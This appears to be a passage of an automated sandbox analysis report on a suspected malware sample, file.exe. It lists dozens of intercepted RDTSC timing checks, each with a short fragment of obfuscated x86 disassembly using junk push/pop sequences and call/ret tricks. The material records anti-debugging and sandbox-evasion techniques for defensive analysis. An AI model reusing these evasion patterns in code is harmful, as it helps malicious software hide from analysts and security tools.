                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D603 second address: 91D630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2493h], ecx 0x00000010 push 00000000h 0x00000012 or edi, dword ptr [ebp+122D37D2h] 0x00000018 call 00007F8FB915C649h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push esi 0x00000021 pop esi 0x00000022 jc 00007F8FB915C646h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D630 second address: 91D671 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8FB8B0B4ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F8FB8B0B4B0h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F8FB8B0B4B0h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007F8FB8B0B4A8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D766 second address: 91D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D81F second address: 91D82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D82F second address: 91D841 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8FB915C646h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D841 second address: 91D851 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D851 second address: 91D857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D857 second address: 91D85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D85C second address: 91D861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D861 second address: 91D867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D867 second address: 91D87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b jno 00007F8FB915C646h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D87D second address: 91D881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9D5 second address: 91D9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9DF second address: 91D9F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F8FB8B0B4A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D9F1 second address: 91DA2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8FB915C655h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA2A second address: 91DA5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FB8B0B4B6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA5D second address: 91DA67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DA67 second address: 91DA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F9B3 second address: 93F9BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8FB915C646h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E67E second address: 93E6AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8FB8B0B4AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8FB8B0B4ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8FB8B0B4A6h 0x00000018 jno 00007F8FB8B0B4A6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E6AD second address: 93E6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E902 second address: 93E906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E906 second address: 93E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8FB915C646h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007F8FB915C64Dh 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E921 second address: 93E929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E929 second address: 93E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E92D second address: 93E955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4B1h 0x00000007 jmp 00007F8FB8B0B4AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jns 00007F8FB8B0B4A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E955 second address: 93E978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F8FB915C64Bh 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E978 second address: 93E997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB8B0B4B2h 0x00000009 popad 0x0000000a jnl 00007F8FB8B0B4B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93236F second address: 93238A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8FB915C646h 0x0000000a jmp 00007F8FB915C651h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93238A second address: 93238E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F2DA second address: 93F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 js 00007F8FB915C646h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F594 second address: 93F59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F59A second address: 93F5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C64Ah 0x00000009 popad 0x0000000a jmp 00007F8FB915C653h 0x0000000f pushad 0x00000010 jmp 00007F8FB915C64Ch 0x00000015 pushad 0x00000016 popad 0x00000017 jns 00007F8FB915C646h 0x0000001d jmp 00007F8FB915C659h 0x00000022 popad 0x00000023 ja 00007F8FB915C656h 0x00000029 jmp 00007F8FB915C64Ah 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9441E1 second address: 9441F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8FB8B0B4A6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F8FB8B0B4A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9461E2 second address: 946201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8FB915C64Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946671 second address: 946677 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946677 second address: 94667E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A3A second address: 946A5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FB8B0B4B8h 0x00000008 jmp 00007F8FB8B0B4B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A5C second address: 946A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A568 second address: 94A572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8FB8B0B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A572 second address: 94A586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8FB915C64Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F8FB915C646h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A586 second address: 94A59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4AEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A59A second address: 94A59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A2C5 second address: 94A2CF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8FB8B0B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A2CF second address: 94A2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D48F second address: 94D495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DF7A second address: 94DF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E067 second address: 94E07D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F8FB8B0B4A6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E07D second address: 94E08B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E08B second address: 94E0A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB8B0B4B6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E39B second address: 94E39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E432 second address: 94E437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E437 second address: 94E43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E43D second address: 94E454 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8FB8B0B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F8FB8B0B4ACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E454 second address: 94E458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E458 second address: 94E4A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F8FB8B0B4ABh 0x0000000f jmp 00007F8FB8B0B4B2h 0x00000014 pop edi 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F8FB8B0B4B4h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E96D second address: 94E986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C655h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E986 second address: 94E98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94E98A second address: 94E9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F8FB915C648h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 pushad 0x00000027 mov di, si 0x0000002a xor ebx, 67D641D8h 0x00000030 popad 0x00000031 call 00007F8FB915C64Eh 0x00000036 mov dword ptr [ebp+122D1B0Dh], ebx 0x0000003c pop ebx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 jmp 00007F8FB915C657h 0x00000045 push eax 0x00000046 jp 00007F8FB915C650h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F3B3 second address: 94F3B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94F3B9 second address: 94F3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950469 second address: 950493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FB8B0B4AFh 0x00000008 jne 00007F8FB8B0B4A6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8FB8B0B4ABh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950D0D second address: 950D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F8FB915C64Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 950D30 second address: 950D3A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FB8B0B4ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952B25 second address: 952B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 952B2A second address: 952B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC37 second address: 90DC4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC4B second address: 90DC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90DC51 second address: 90DC84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8FB915C64Fh 0x00000010 jmp 00007F8FB915C656h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569C0 second address: 9569C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9569C7 second address: 9569D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8FB915C646h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A24D second address: 95A252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A252 second address: 95A258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95926B second address: 95926F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C277 second address: 95C281 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FB915C646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C281 second address: 95C333 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8FB8B0B4A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F8FB8B0B4B3h 0x00000013 jmp 00007F8FB8B0B4AFh 0x00000018 popad 0x00000019 nop 0x0000001a mov bx, si 0x0000001d push dword ptr fs:[00000000h] 0x00000024 jmp 00007F8FB8B0B4ADh 0x00000029 mov di, AB63h 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F8FB8B0B4A8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e add dword ptr [ebp+1245563Fh], edi 0x00000054 mov eax, dword ptr [ebp+122D0F01h] 0x0000005a mov dword ptr [ebp+122D25C2h], eax 0x00000060 push FFFFFFFFh 0x00000062 mov edi, dword ptr [ebp+122D398Eh] 0x00000068 js 00007F8FB8B0B4ACh 0x0000006e mov dword ptr [ebp+122D2B2Eh], edx 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 push ebx 0x00000078 jmp 00007F8FB8B0B4B2h 0x0000007d pop ebx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C333 second address: 95C358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB915C64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FB915C651h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F11A second address: 95F11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960228 second address: 96022C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96022C second address: 960232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960232 second address: 960238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960238 second address: 9602D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FB8B0B4ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F8FB8B0B4A8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F8FB8B0B4A8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push esi 0x00000043 mov bh, F9h 0x00000045 pop ebx 0x00000046 jng 00007F8FB8B0B4ACh 0x0000004c mov dword ptr [ebp+122D1C31h], edx 0x00000052 push 00000000h 0x00000054 jmp 00007F8FB8B0B4B6h 0x00000059 mov ebx, 4389436Ah 0x0000005e push eax 0x0000005f jbe 00007F8FB8B0B4BFh 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F8FB8B0B4B1h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9612E3 second address: 961370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FB915C656h 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F8FB915C648h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F8FB915C659h 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D274Dh], esi 0x00000036 xchg eax, esi 0x00000037 jmp 00007F8FB915C651h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F8FB915C659h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961370 second address: 961376 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962327 second address: 962342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FB915C657h 0x00000009 rdtsc
